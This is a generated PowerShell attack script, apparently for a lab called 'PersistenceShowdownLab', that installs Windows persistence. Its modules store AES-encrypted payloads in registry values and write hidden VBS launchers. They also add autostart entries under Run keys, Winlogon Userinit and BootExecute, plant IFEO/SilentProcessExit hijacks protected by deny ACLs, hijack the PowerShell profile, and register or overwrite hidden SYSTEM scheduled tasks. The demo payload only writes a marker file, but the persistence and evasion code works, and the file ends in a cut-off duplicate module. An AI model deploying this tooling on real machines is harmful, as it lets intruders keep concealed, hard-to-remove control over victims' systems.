# attacker_final.ps1
# Auto-generated by build.ps1 – do not edit manually
# Generated: 2026-05-04 22:40:10

# === MODULE: duhh_module.ps1 ===
$path = 'C:\Users\Public\Documents'
$file = Join-Path $path 'pwned.txt'

# Ensure directory exists
if (-not (Test-Path -Path $path)) {
    New-Item -ItemType Directory -Path $path -Force | Out-Null
}

# Write text to file (overwrites if exists)
"Pwn3d. duhhhh" | Set-Content -Path $file -Encoding UTF8

# Optional: confirm
Write-Output "Wrote file: $file"

# === MODULE: attack.hkcu.ps1 ===
$plainPayload = "Set-Content -Path 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -Force"


function e($t,$s,$l){
    $d=New-Object Security.Cryptography.Rfc2898DeriveBytes($l,[Text.Encoding]::UTF8.GetBytes($s),10000)
    $c=[Security.Cryptography.Aes]::Create()
    $c.Key=$d.GetBytes(32)
    $c.IV=$d.GetBytes(16)
    $x=$c.CreateEncryptor()
    $b=$x.TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($t),0,$t.Length)
    $x.Dispose()
    $c.Dispose()
    $d.Dispose()
    [Convert]::ToBase64String($b)
}

function Set-RegValue($k,$n,$v){
    if(-not (Test-Path $k)){New-Item $k -Force -ErrorAction SilentlyContinue|Out-Null}
    Set-ItemProperty $k $n $v -Force -ErrorAction SilentlyContinue|Out-Null
}

function Backdate-File {
    param([string]$Path, [DateTime]$TargetDate)
    if (Test-Path $Path -ErrorAction SilentlyContinue) {
        try {
            $item = Get-Item $Path -Force -ErrorAction SilentlyContinue
            if ($item -and $item.FullName -notlike "*.DAT*" -and $item.FullName -notlike "*NTUSER*") {
                $item.CreationTime = $TargetDate
                $item.LastWriteTime = $TargetDate
                $item.LastAccessTime = $TargetDate
                Write-Host "[*] Backdated: $Path" -ForegroundColor Green
                return $true
            }
        } catch {}
    }
    return $false
}


Write-Host "[*] Installing HKCU persistence chains..." -ForegroundColor Cyan

# PRIMARY CHAIN - Store encrypted payload
$e1=e $plainPayload "StaticSalt1234" "S3cr3tK3y!2024#Showdown"
Set-RegValue "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" "CacheData" $e1
Write-Host "[PRIMARY] Blob stored in AppCompatFlags\Layers" -ForegroundColor Green

# PRIMARY CHAIN - Loader script
$l1='try{$d=[Security.Cryptography.Rfc2898DeriveBytes]::new("S3cr3tK3y!2024#Showdown",[Text.Encoding]::UTF8.GetBytes("StaticSalt1234"),10000);$k=$d.GetBytes(32);$iv=$d.GetBytes(16);$e=(gp "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" CacheData -EA 0).CacheData;if($e){$a=[Security.Cryptography.Aes]::Create();$a.Key=$k;$a.IV=$iv;$p=$a.CreateDecryptor().TransformFinalBlock([Convert]::FromBase64String($e),0,$e.Length);iex([Text.Encoding]::UTF8.GetString($p))}}catch{}'
$eL1=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($l1))

# PRIMARY CHAIN - VBS wrapper
$v=$null
foreach($x in @("$env:APPDATA\Microsoft\Installer\msihelper.vbs","$env:APPDATA\Microsoft\Windows\Caches\cache.vbs")){
try{$d=Split-Path $x;if(!(Test-Path $d)){New-Item $d -ItemType Directory -Force|Out-Null}
$c=@();for($i=0;$i -lt $eL1.Length;$i+=8){$c+=$eL1.Substring($i,[Math]::Min(8,$eL1.Length-$i))}
$vbs="On Error Resume Next`nSet sh=CreateObject(""WScript.Shell"")`nc=""powershell -window hidden -exec bypass -enc ""&""$($c -join '""&""')""`nsh.Run c,0,False"
Set-Content $x $vbs -Encoding ASCII -Force;(gi $x -Force).Attributes=6;$v=$x;break}catch{}}
$c=if($v){"wscript.exe //B //Nologo `"$v`""}else{"powershell.exe -Exec Bypass -Window Hidden -Enc $eL1"}

# HKCU Triggers
# Set-RegValue "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" "Load" $c  <-- Problematic line? (Robin)
Set-RegValue "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" "UpdateHelper" $c
Set-RegValue "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" "TempCleanup" $c
# Set-RegValue "HKCU:\Environment" "windir" $c  <-- Problematic line? (Robin)
Set-RegValue "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" "WindowsUpdate" $c

# BACKUP CHAIN - Store encrypted payload
$e2=e $plainPayload "DifferentSalt5678" "BackupKey!2024#DifferentPassword"
Set-RegValue "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" "CompatData" $e2

# BACKUP CHAIN - Loader script
$l2='try{$d=[Security.Cryptography.Rfc2898DeriveBytes]::new("BackupKey!2024#DifferentPassword",[Text.Encoding]::UTF8.GetBytes("DifferentSalt5678"),10000);$k=$d.GetBytes(32);$iv=$d.GetBytes(16);$e=(gp "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" CompatData -EA 0).CompatData;if($e){$a=[Security.Cryptography.Aes]::Create();$a.Key=$k;$a.IV=$iv;$p=$a.CreateDecryptor().TransformFinalBlock([Convert]::FromBase64String($e),0,$e.Length);iex([Text.Encoding]::UTF8.GetString($p))}}catch{}'
$eL2=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($l2))

# BACKUP CHAIN - VBS wrapper
$bvp="$env:APPDATA\Microsoft\Internet Explorer\UserData\iehelper.vbs"
$d=Split-Path $bvp;if(!(Test-Path $d)){New-Item $d -ItemType Directory -Force|Out-Null}
$c2=@();for($i=0;$i -lt $eL2.Length;$i+=8){$c2+=$eL2.Substring($i,[Math]::Min(8,$eL2.Length-$i))}
$v2="On Error Resume Next`nSet sh=CreateObject(""WScript.Shell"")`nc=""powershell -window hidden -exec bypass -enc ""&""$($c2 -join '""&""')""`nsh.Run c,0,False"
Set-Content $bvp $v2 -Encoding ASCII -Force;(gi $bvp -Force).Attributes=6
$c2e="wscript.exe //B //Nologo `"$bvp`""
Write-Host "[BACKUP] VBS wrapper: $bvp" -ForegroundColor Green

# BACKUP CHAIN - Triggers
# Set-RegValue "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" "Load" $c2e  <-- Problematic line? (Robin)
# Set-RegValue "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" "Startup" $c2e <-- Problematic line? (Robin)
Set-RegValue "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" "Configuration" $c2e

Write-Host "[BACKUP] Backup triggers installed" -ForegroundColor Green

# === MODULE: attack.hklm.ps1 ===
$plainPayload = "Set-Content -Path 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -Force"

function e($t,$s,$l){
    $d=New-Object Security.Cryptography.Rfc2898DeriveBytes($l,[Text.Encoding]::UTF8.GetBytes($s),10000)
    $c=[Security.Cryptography.Aes]::Create()
    $c.Key=$d.GetBytes(32)
    $c.IV=$d.GetBytes(16)
    $x=$c.CreateEncryptor()
    $b=$x.TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($t),0,$t.Length)
    $x.Dispose()
    $c.Dispose()
    $d.Dispose()
    [Convert]::ToBase64String($b)
}

function Set-RegValue($k,$n,$v){
    if(-not (Test-Path $k)){New-Item $k -Force -ErrorAction SilentlyContinue|Out-Null}
    Set-ItemProperty $k $n $v -Force -ErrorAction SilentlyContinue|Out-Null
}

function Backdate-File {
    param([string]$Path, [DateTime]$TargetDate)
    if (Test-Path $Path -ErrorAction SilentlyContinue) {
        try {
            $item = Get-Item $Path -Force -ErrorAction SilentlyContinue
            if ($item -and $item.FullName -notlike "*.DAT*" -and $item.FullName -notlike "*NTUSER*") {
                $item.CreationTime = $TargetDate
                $item.LastWriteTime = $TargetDate
                $item.LastAccessTime = $TargetDate
                Write-Host "[*] Backdated: $Path" -ForegroundColor Green
                return $true
            }
        } catch {}
    }
    return $false
}


Write-Host "[*] Installing HKLM persistence chains..." -ForegroundColor Cyan

# PRIMARY CHAIN - Store encrypted payload
$e1=e $plainPayload "StaticSalt1234" "S3cr3tK3y!2024#Showdown"
Set-RegValue "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "DriverData" $e1

# PRIMARY CHAIN - Loader script
$l1='try{$d=[Security.Cryptography.Rfc2898DeriveBytes]::new("S3cr3tK3y!2024#Showdown",[Text.Encoding]::UTF8.GetBytes("StaticSalt1234"),10000);$k=$d.GetBytes(32);$iv=$d.GetBytes(16);$e=(gp "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" DriverData -EA 0).DriverData;if($e){$a=[Security.Cryptography.Aes]::Create();$a.Key=$k;$a.IV=$iv;$p=$a.CreateDecryptor().TransformFinalBlock([Convert]::FromBase64String($e),0,$e.Length);iex([Text.Encoding]::UTF8.GetString($p))}}catch{}'
$eL1=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($l1))

# PRIMARY CHAIN - VBS wrapper
$v=$null
foreach($x in @("$env:ProgramData\Microsoft\Installer\msihelper.vbs","$env:ProgramData\Microsoft\Windows\Caches\cache.vbs")){
try{$d=Split-Path $x;if(!(Test-Path $d)){New-Item $d -ItemType Directory -Force|Out-Null}
$c=@();for($i=0;$i -lt $eL1.Length;$i+=8){$c+=$eL1.Substring($i,[Math]::Min(8,$eL1.Length-$i))}
$vbs="On Error Resume Next`nSet sh=CreateObject(""WScript.Shell"")`nc=""powershell -window hidden -exec bypass -enc ""&""$($c -join '""&""')""`nsh.Run c,0,False"
Set-Content $x $vbs -Encoding ASCII -Force;(gi $x -Force).Attributes=6;$v=$x;break}catch{}}
$c=if($v){"wscript.exe //B //Nologo `"$v`""}else{"powershell.exe -Exec Bypass -Window Hidden -Enc $eL1"}

# HKLM Triggers
$w=(gp "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" Userinit -EA 0).Userinit
$n=if($w -and $w -notlike "*$c*"){"$w,$c"}elseif(!$w){"C:\Windows\system32\userinit.exe,$c"}else{$w}
Set-RegValue "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" "Userinit" $n
Write-Host "[PRIMARY] Winlogon\Userinit appended" -ForegroundColor Green

$b=(gp "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" BootExecute -EA 0).BootExecute
$m=if($b -and $b -notlike "*$c*"){"$b`n$c"}elseif(!$b){"autocheck autochk *`n$c"}else{$b}
Set-RegValue "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" "BootExecute" $m
Write-Host "[PRIMARY] BootExecute appended" -ForegroundColor Green

Set-RegValue "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" "SystemHelper" $c
Set-RegValue "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" "OneTimeSetup" $c
Set-RegValue "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices" "ServiceHost" $c
Set-RegValue "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" "WindowsDefenderStatus" $c
Set-RegValue "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" "WindowsDefenderStatus" $c
Write-Host "[PRIMARY] HKLM triggers installed" -ForegroundColor Green

# BACKUP CHAIN - Store encrypted payload
$e2=e $plainPayload "DifferentSalt5678" "BackupKey!2024#DifferentPassword"
Set-RegValue "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" "CompatData" $e2
Write-Host "[BACKUP] Blob stored in AppCompatFlags\Custom" -ForegroundColor Green

# BACKUP CHAIN - Loader script
$l2='try{$d=[Security.Cryptography.Rfc2898DeriveBytes]::new("BackupKey!2024#DifferentPassword",[Text.Encoding]::UTF8.GetBytes("DifferentSalt5678"),10000);$k=$d.GetBytes(32);$iv=$d.GetBytes(16);$e=(gp "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" CompatData -EA 0).CompatData;if($e){$a=[Security.Cryptography.Aes]::Create();$a.Key=$k;$a.IV=$iv;$p=$a.CreateDecryptor().TransformFinalBlock([Convert]::FromBase64String($e),0,$e.Length);iex([Text.Encoding]::UTF8.GetString($p))}}catch{}'
$eL2=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($l2))

# BACKUP CHAIN - VBS wrapper
$bvp="$env:ProgramData\Microsoft\Internet Explorer\UserData\iehelper.vbs"
$d=Split-Path $bvp;if(!(Test-Path $d)){New-Item $d -ItemType Directory -Force|Out-Null}
$c2=@();for($i=0;$i -lt $eL2.Length;$i+=8){$c2+=$eL2.Substring($i,[Math]::Min(8,$eL2.Length-$i))}
$v2="On Error Resume Next`nSet sh=CreateObject(""WScript.Shell"")`nc=""powershell -window hidden -exec bypass -enc ""&""$($c2 -join '""&""')""`nsh.Run c,0,False"
Set-Content $bvp $v2 -Encoding ASCII -Force;(gi $bvp -Force).Attributes=6
$c2e="wscript.exe //B //Nologo `"$bvp`""
Write-Host "[BACKUP] VBS wrapper: $bvp" -ForegroundColor Green

# BACKUP CHAIN - Triggers
Set-RegValue "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" "Startup" $c2e
Set-RegValue "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" "StartupPrograms" $c2e
Write-Host "[BACKUP] HKLM backup triggers installed" -ForegroundColor Green

Write-Host "[+] HKLM persistence completed" -ForegroundColor Green

# === MODULE: ifeo.ps1 ===
#Requires -RunAsAdministrator
<#
.SYNOPSIS
    Attacker-Script: Setzt IFEO GlobalFlag und SilentProcessExit MonitorProcess
    für userinit.exe. Schützt die Einträge via Registry-ACL gegen Entfernung.
#>

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class TokenUtil {
    [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool LookupPrivilegeValue(string host, string name, ref long luid);
    [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr tok, bool disable,
        ref LUID_AND_ATTRIBUTES newState, int len, IntPtr prev, IntPtr relen);
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    struct LUID_AND_ATTRIBUTES { public int Count; public long Luid; public int Attr; }
    public static void Enable(string privilege) {
        IntPtr proc = System.Diagnostics.Process.GetCurrentProcess().Handle;
        IntPtr tok = IntPtr.Zero;
        OpenProcessToken(proc, 0x20 | 0x8, ref tok);
        LUID_AND_ATTRIBUTES tp; tp.Count = 1; tp.Luid = 0; tp.Attr = 2;
        LookupPrivilegeValue(null, privilege, ref tp.Luid);
        AdjustTokenPrivileges(tok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
    }
}
"@

$targetProcess = "userinit.exe"

$ifeoPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$targetProcess"
$spePath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\$targetProcess"
$ifeoParentPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

function Set-RegistryDenyDelete {
    param ([string]$RegistryPath)

    Write-Host "[*] Verarbeite: $RegistryPath"

    if (-not (Test-Path $RegistryPath)) {
        Write-Warning "    Schlüssel existiert nicht, überspringe: $RegistryPath"
        return
    }

    $cleanPath = $RegistryPath -replace "^HKLM:\\", ""

    try {
        $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
            $cleanPath,
            [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
            [System.Security.AccessControl.RegistryRights]::ChangePermissions
        )

        if ($null -eq $key) {
            Write-Warning "    Konnte Schlüssel nicht öffnen (keine Rechte?): $RegistryPath"
            return
        }

        $acl = $key.GetAccessControl()

        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            "Everyone",
            ([System.Security.AccessControl.RegistryRights]::Delete -bor
             [System.Security.AccessControl.RegistryRights]::SetValue -bor
             [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
             [System.Security.AccessControl.RegistryRights]::TakeOwnership),
            [System.Security.AccessControl.InheritanceFlags]::None,
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Deny
        )

        $acl.AddAccessRule($rule)
        $key.SetAccessControl($acl)
        $key.Close()

        Write-Host "    [+] Deny Delete/SetValue/ChangePermissions/TakeOwnership gesetzt." -ForegroundColor Green

    } catch {
        Write-Error "    Fehler bei $RegistryPath`: $_"
    }
}

function Set-RegistryOwnerTrustedInstaller {
    param ([string]$RegistryPath)

    $cleanPath = $RegistryPath -replace "^HKLM:\\", ""

    try {
        [TokenUtil]::Enable("SeRestorePrivilege")
        [TokenUtil]::Enable("SeTakeOwnershipPrivilege")

        $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
            $cleanPath,
            [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
            [System.Security.AccessControl.RegistryRights]::TakeOwnership
        )

        if ($null -eq $key) {
            Write-Warning "    TakeOwnership fehlgeschlagen (keine Rechte?): $RegistryPath"
            return
        }

        $acl = $key.GetAccessControl([System.Security.AccessControl.AccessControlSections]::Owner)
        $trustedInstaller = New-Object System.Security.Principal.NTAccount("NT SERVICE", "TrustedInstaller")
        $acl.SetOwner($trustedInstaller)
        $key.SetAccessControl($acl)
        $key.Close()

        Write-Host "    [+] Owner auf TrustedInstaller gesetzt." -ForegroundColor Green

    } catch {
        Write-Error "    Fehler bei $RegistryPath`: $_"
    }
}


function Set-RegistryDenyDeleteSubkeys {
    param ([string]$RegistryPath)

    $cleanPath = $RegistryPath -replace "^HKLM:\\", ""
    try {
        $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
            $cleanPath,
            [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
            [System.Security.AccessControl.RegistryRights]::ChangePermissions
        )

        if ($null -eq $key) {
            Write-Warning "    Konnte Parent nicht öffnen: $RegistryPath"
            return
        }

        $acl = $key.GetAccessControl()
        $rule = New-Object System.Security.AccessControl.RegistryAccessRule(
            "Everyone",
            ([System.Security.AccessControl.RegistryRights]::Delete -bor
            [System.Security.AccessControl.RegistryRights]::CreateSubKey),
            [System.Security.AccessControl.InheritanceFlags]::None,
            [System.Security.AccessControl.PropagationFlags]::None,
            [System.Security.AccessControl.AccessControlType]::Deny
        )
        $acl.AddAccessRule($rule)
        $key.SetAccessControl($acl)
        $key.Close()

        Write-Host "    [+] Deny DeleteSubdirectories auf Parent gesetzt." -ForegroundColor Green
    } catch {
        Write-Error "    Fehler bei $RegistryPath`: $_"
    }
}


try {
    # IFEO-Schluessel erstellen
    New-Item -Path $ifeoPath -Force

    # GlobalFlag setzen (0x200 = 512 als Dezimal)
    New-ItemProperty -Path $ifeoPath `
        -Name "GlobalFlag" `
        -Value 512 `
        -PropertyType DWORD `
        -Force

    # SilentProcessExit-Schluessel erstellen
    New-Item -Path $spePath -Force

    # MonitorProcess setzen
    New-ItemProperty -Path $spePath `
        -Name "MonitorProcess" `
        -Value "C:\Windows\System32\cmd.exe /c echo Pwn3d > C:\Users\Public\Documents\pwned.txt" `
        -PropertyType String `
        -Force

    # ReportingMode setzen - notwendig, um den MonitorProzess zu starten
    New-ItemProperty -Path $spePath `
        -Name "ReportingMode" `
        -Value 1 `
        -PropertyType DWORD `
        -Force


    # Owner zuerst setzen (muss vor Deny TakeOwnership passieren)
    Set-RegistryOwnerTrustedInstaller $ifeoPath
    Set-RegistryOwnerTrustedInstaller $spePath

    # Danach ACL sperren
    Set-RegistryDenyDelete $ifeoPath
    Set-RegistryDenyDelete $spePath
    Set-RegistryDenyDeleteSubkeys $ifeoParentPath

} catch {
    Write-Host "IFEO was not successful: $_" -ForegroundColor Yellow
}

# === MODULE: profile_attack.ps1 ===
Write-Host "[*] Installing PowerShell profile persistence..." -ForegroundColor Cyan

$code = "Set-Content -Path 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -Force"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($code))

# Create or modify PowerShell profile
$profileDir = Split-Path $PROFILE -Parent
if (-not (Test-Path $profileDir)) {
    New-Item -ItemType Directory -Path $profileDir -Force | Out-Null
}

# Write profile content
$profileContent = @"
# PowerShell Profile
Remove-Variable -Name profile -ErrorAction SilentlyContinue
powershell -NoProfile -Enc $encoded
"@

Set-Content -Path $PROFILE -Value $profileContent -Force
Write-Host "[PROFILE] Profile installed at: $PROFILE" -ForegroundColor Green

# Make profile hidden
try {
    (Get-Item $PROFILE -Force).Attributes = [System.IO.FileAttributes]::Hidden -bor [System.IO.FileAttributes]::System
    Write-Host "[PROFILE] Profile set to Hidden + System" -ForegroundColor Green
} catch {}

Write-Host "[+] PowerShell profile persistence completed" -ForegroundColor Green

# === MODULE: scheduled_tasks.ps1 ===
$taskPath = '\PersistenceShowdownLab\'
$workDir = Join-Path $env:ProgramData 'PersistenceShowdownLab\ScheduledTasks'
$payloadPath = 'C:\Users\Public\Documents\pwned.txt'
$payloadText = 'Pwn3d'
$psExe = Join-Path $env:WINDIR 'System32\WindowsPowerShell\v1.0\powershell.exe'
$cmdExe = Join-Path $env:WINDIR 'System32\cmd.exe'
$wscriptExe = Join-Path $env:WINDIR 'System32\wscript.exe'

$newTaskNames = @(
    'PSUnit-Startup-ProfileCache',
    'PSUnit-Logon-CloudSync',
    'PSUnit-Startup-WinUpdateCache'
)

$existingTaskCandidates = @(
    [ordered]@{ TaskPath = '\Microsoft\Windows\Application Experience\'; TaskName = 'ProgramDataUpdater' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Customer Experience Improvement Program\'; TaskName = 'Consolidator' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\DiskCleanup\'; TaskName = 'SilentCleanup' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Windows Error Reporting\'; TaskName = 'QueueReporting' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Maintenance\'; TaskName = 'WinSAT' },
    [ordered]@{ TaskPath = '\Microsoft\Windows\Maps\'; TaskName = 'MapsUpdateTask' }
)

function Write-Step { param([string]$Text) Write-Host "[*] $Text" -ForegroundColor Cyan }
function Write-OK { param([string]$Text) Write-Host "    [OK] $Text" -ForegroundColor Green }
function Write-Warn { param([string]$Text) Write-Host "    [WARN] $Text" -ForegroundColor Yellow }

function Invoke-ScheduledTaskAttempt {
    param([string]$Name, [scriptblock]$ScriptBlock)

    try {
        & $ScriptBlock
    } catch {
        Write-Warn "Scheduled task attempt '$Name' failed: $_"
    }
}

function Get-TaskIdentity {
    param([string]$Path, [string]$Name)
    if (-not $Path.EndsWith('\')) { $Path += '\' }
    return "$Path$Name"
}

function Remove-NewLabTasks {
    foreach ($name in $newTaskNames) {
        try {
            Unregister-ScheduledTask -TaskName $name -TaskPath $taskPath -Confirm:$false -ErrorAction SilentlyContinue
            & schtasks.exe /Delete /TN "$taskPath$name" /F 2>$null | Out-Null
        } catch {}
    }
}

function New-PayloadScript {
    param([string]$Path, [int]$DelaySeconds = 0)

    $content = @"
`$ErrorActionPreference = 'SilentlyContinue'
if ($DelaySeconds -gt 0) { Start-Sleep -Seconds $DelaySeconds }
New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null
Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII
"@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-PayloadVbs {
    param([string]$Path)

    $content = @'
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists("C:\Users\Public\Documents") Then
    fso.CreateFolder("C:\Users\Public\Documents")
End If
Set f = fso.CreateTextFile("C:\Users\Public\Documents\pwned.txt", True)
f.Write "Pwn3d"
f.Close
'@
    Set-Content -LiteralPath $Path -Value $content -Encoding ASCII -ErrorAction Stop
}

function New-EncodedPayload {
    $command = "New-Item -ItemType Directory -Path 'C:\Users\Public\Documents' -Force | Out-Null; Set-Content -LiteralPath 'C:\Users\Public\Documents\pwned.txt' -Value 'Pwn3d' -NoNewline -Encoding ASCII"
    return [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
}

function Register-LabTask {
    param(
        [string]$Path,
        [string]$Name,
        [string]$Description,
        $Action,
        $Trigger,
        [switch]$Hidden
    )

    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    $settingsArgs = @{
        AllowStartIfOnBatteries = $true
        DontStopIfGoingOnBatteries = $true
        StartWhenAvailable = $true
        MultipleInstances = 'IgnoreNew'
        ExecutionTimeLimit = (New-TimeSpan -Minutes 5)
    }
    if ($Hidden) { $settingsArgs['Hidden'] = $true }
    $settings = New-ScheduledTaskSettingsSet @settingsArgs

    Register-ScheduledTask -TaskName $Name -TaskPath $Path -Action $Action -Trigger $Trigger -Principal $principal -Settings $settings -Description $Description -Force -ErrorAction Stop | Out-Null
    Write-OK "Registered $(Get-TaskIdentity $Path $Name)"
}

function Get-HijackTargets {
    $targets = @()
    foreach ($candidate in $existingTaskCandidates) {
        try {
            $task = Get-ScheduledTask -TaskPath $candidate.TaskPath -TaskName $candidate.TaskName -ErrorAction Stop
            if ($null -ne $task) {
                $targets += $candidate
                if ($targets.Count -ge 2) { break }
            }
        } catch {}
    }
    return @($targets)
}

Write-Step "Preparing scheduled task helper files"
$profileCacheScript = Join-Path $workDir 'profile-cache.ps1'
$delayedScript = Join-Path $workDir 'userinit-bridge.ps1'
$vbsScript = Join-Path $workDir 'event-cache.vbs'
$helpersReady = $false
try {
    New-Item -ItemType Directory -Path $workDir -Force -ErrorAction Stop | Out-Null
    New-PayloadScript -Path $profileCacheScript
    New-PayloadScript -Path $delayedScript -DelaySeconds 20
    New-PayloadVbs -Path $vbsScript
    $helpersReady = $true
    Write-OK "Helper files written to $workDir"
} catch {
    Write-Warn "Could not prepare scheduled task helper files: $_"
}

Write-Step "Removing previous lab-owned new tasks"
try {
    Remove-NewLabTasks
    Write-OK "Removed lab-owned new tasks if present"
} catch {
    Write-Warn "Could not remove previous lab-owned new tasks: $_"
}

Write-Step "Installing 3 new scheduled task persistence variants"
$encoded = ''
try {
    $encoded = New-EncodedPayload
} catch {
    Write-Warn "Could not generate encoded scheduled task payload: $_"
}

Invoke-ScheduledTaskAttempt 'PSUnit-Startup-ProfileCache' {
    if (-not $helpersReady) { throw 'helper files were not prepared' }
    Register-LabTask `
        -Path $taskPath `
        -Name 'PSUnit-Startup-ProfileCache' `
        -Description 'Lab test: new hidden SYSTEM startup task that launches a ProgramData PowerShell helper.' `
        -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$profileCacheScript`"" -WorkingDirectory $workDir) `
        -Trigger (New-ScheduledTaskTrigger -AtStartup) `
        -Hidden
}

Invoke-ScheduledTaskAttempt 'PSUnit-Logon-CloudSync' {
    Register-LabTask `
        -Path $taskPath `
        -Name 'PSUnit-Logon-CloudSync' `
        -Description 'Lab test: new logon task using cmd.exe to write the project proof file.' `
        -Action (New-ScheduledTaskAction -Execute $cmdExe -Argument "/c echo $payloadText>$payloadPath") `
        -Trigger (New-ScheduledTaskTrigger -AtLogOn)
}

Invoke-ScheduledTaskAttempt 'PSUnit-Startup-WinUpdateCache' {
    if ([string]::IsNullOrWhiteSpace($encoded)) { throw 'encoded payload was not generated' }
    Register-LabTask `
        -Path $taskPath `
        -Name 'PSUnit-Startup-WinUpdateCache' `
        -Description 'Lab test: new hidden startup task using an encoded PowerShell command.' `
        -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -EncodedCommand $encoded") `
        -Trigger (New-ScheduledTaskTrigger -AtStartup) `
        -Hidden
}

Write-Step "Overwriting 2 existing scheduled task names"
$targets = @(Get-HijackTargets)
if ($targets.Count -lt 2) {
    Write-Warn "Only found $($targets.Count) existing task candidate(s). The script will overwrite what it found."
}

$i = 0
foreach ($target in $targets) {
    try {
        if ($i -eq 0) {
            if (-not $helpersReady) { throw 'helper files were not prepared' }
            Register-LabTask `
                -Path $target.TaskPath `
                -Name $target.TaskName `
                -Description 'Lab test: existing Windows task name overwritten with a PowerShell helper action.' `
                -Action (New-ScheduledTaskAction -Execute $psExe -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$delayedScript`"" -WorkingDirectory $workDir) `
                -Trigger (New-ScheduledTaskTrigger -AtStartup) `
                -Hidden
        } else {
            if (-not $helpersReady) { throw 'helper files were not prepared' }
            Register-LabTask `
                -Path $target.TaskPath `
                -Name $target.TaskName `
                -Description 'Lab test: existing Windows task name overwritten with Windows Script Host action.' `
                -Action (New-ScheduledTaskAction -Execute $wscriptExe -Argument "//B `"$vbsScript`"" -WorkingDirectory $workDir) `
                -Trigger (New-ScheduledTaskTrigger -AtStartup)
        }
        $i++
    } catch {
        Write-Warn "Could not overwrite $(Get-TaskIdentity $target.TaskPath $target.TaskName): $_"
    }
}

Write-Host ""
Write-Host "[DONE] Installed scheduled task unit-test persistences." -ForegroundColor Green
Write-Host "Created 3 new tasks and attempted to overwrite 2 existing task candidates." -ForegroundColor Yellow
Write-Host "Revert the VMware snapshot to restore the VM." -ForegroundColor Yellow

# === MODULE: scheduled_tasks.ps1 ===
$taskPath = '\PersistenceShowdownLab\'
$workDir = Join-Path $env:ProgramData 'PersistenceShowdownLab\ScheduledTasks'
$payloadPath = 'C:\Users\Public\Documents\pwned.txt'
$payloadText = 'Pwn3d'
